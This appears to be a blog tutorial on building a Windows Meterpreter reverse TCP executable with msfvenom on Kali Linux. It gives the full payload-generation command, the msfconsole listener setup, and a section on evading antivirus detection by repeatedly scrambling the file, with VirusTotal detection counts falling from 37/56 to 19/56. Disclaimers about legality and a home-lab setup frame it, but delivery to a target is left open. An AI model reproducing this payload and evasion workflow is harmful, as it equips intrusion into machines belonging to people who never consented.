MSFVenom: How to create reverse tcp payload in Kali Linux

The power of MSFVenom!

The MSFVenom environment is providing a lot of options in just a single terminal window. In this tutorial we are going to take a look on how to create a reverse tcp payload in the Kali Linux operating system.

For this tutorial you will need a couple of things prepared:

The VirtualBox software is needed so you will be able to run a virtual environment on your current machine. We are not going to make this payload public because that would be illegal, instead we are going to test this payload on our own virtual environment.

The Kali Linux ISO is needed so you will be able to run the MSFVenom code which is automatically installed on the Kali Linux operating system. You can install the Kali Linux environment on the Virtualbox machine or you could use a physical machine to run Kali Linux on.

The Internet connection is needed so you can download the latest updates and upgrades which are available for the Kali Linux and MSFVenom environments. The updates will allow you to use the latest public payloads and techniques.

You will also need an windows target operating system installed. We are going to target the local windows environment because that is the only way to perform a legal payload test with the MSFVenom application.

If you use MSFVenom to gain access on computers without authorization then you will be performing an illegal act which is punishable in ALL countries.

MSFVenom

Now I believe that you have a solid local environment setup to test your pentesting skills on. The first step which we will do is BOOT UP the Kali Linux environment and login so we will have the Kali Linux desktop available.

If you are using the live version of the Kali Linux operating system your username and password will be:

username: root

password: toor

Now go ahead and open the terminal which is available in the Kali Linux operating system.

Enter the following commands in the terminal:

  1. sudo apt-get update
  2. sudo apt-get upgrade
  3. sudo service postgresql start
  4. sudo service metasploit start

The first two commands will check for the latest updates and the last two commands are needed for the MSFVenom environment. The postgresql service will allow the Metasploit database to be build and the Metasploit service will provide the various options that are available in the MSFVenom application.

Creating the Payload

Go ahead and open a new terminal in your Kali Linux environment. In the new terminal you will have to enter this command:

ifconfig

The ifconfig command will show you your local IP address which is used by the Kali Linux operating system. We will need this IP in the future, so make sure that you note down your IP.

The IP which is used in this tutorial is

192.168.23.103 – Kali Linux machine

Now that we know the local IP we can continue to the MSFVenom application. In the same terminal window you will need to enter the following command:

msfvenom -h

The msfvenom -h command will start the msfvenom application and it will load the available options which can be used in the msfvenom application.

The payload

To create the reverse tcp msfvenom payload we will need to provide the following commands in the same terminal:

msfvenom -p windows/meterpreter/reverse_tcp -o

The command above will show the options which are needed by the meterpreter reverse tcp payload.

The msfvenom reverse tcp payload requires the following options:

LHOST=192.168.23.103

LPORT=443

So the command which will create the MSFVenom reverse tcp payload is:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.23.103 LPORT=443 -f exe > Cyberwarzone_reverse_tcp.exe

Now that we have crafted the payload, we will need to make sure that the payload is not detected by antivirus scanners. The -e x86/shikata_ga_nai -i 5 -b ‘\x00’ command makes sure that the payload is encoded, but that is not enough. The antivirus companies are aware of this method and they have found ways to identify payloads which have been encoded by the MSFVenom encoding methods.

Launching the payload

Now you have to make sure that you get the payload on the target machine. There are various ways to do this, and I will leave it at that.

We have only created the payload, we also need to create the listener which allows us to exploit the targeted device which is using the reverse_tcp payload.

To do this, we need to follow the following commands:

  1. open a new terminal
  2. sudo msfconsole use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp
  4. set lhost 192.168.23.103
  5. set lport 443
  6. exploit

Now we have to run the payload on the target machine and wait for the infected machine to connect to our newly crafted msfvenom reverse tcp handler which is listening on the port 443 and the 192.168.23.103 ip.

Back to the encryption part of the MSFVenom payload

Encrypting the MSFVenom payloads with the MSFvenom encode option is not enough. The antivirus companies are aware of the encoding methods and they have found ways to identify them. Now there is a Google project which is titled prescrambler which has been crafted to scramble .exe files. The scramble will make it harder for the antivirus companies to identify the malicious payloads.

Let’s take a look on our tests.

37/56 of the Antivirus companies which are listed on VirusTotal were able to identify the malicious MSFVenom payload.

Now we double encoded it with the prescrambler application.

The scrambler in action
The scrambler in action

 

Lets take a look at the results.

As we can see in the scan above, only 25/56 were able to identify the malicious MSFVenom payload. Note that we only used the prescrambler on the first crafted payload. Now I was thinking, what would happen if I would scramble the scrambled file (cyberwarzone_reverse_tcp_encrypted.exe) again with the prescrambler application?

Scrambling the scrambled file again
Scrambling the scrambled file again

 

This was the result

We can see in the results above that only 19/56 antivirus scanners were able to identify the malicious MSFvenom payload. We can easily state that it takes extra effort to create a successfull MSFVenom payload which is able to hit computers that have an up to date antivirus application installed, it takes a couple of steps to make sure that it is not identified.

Founder of Cyberwarzone.com.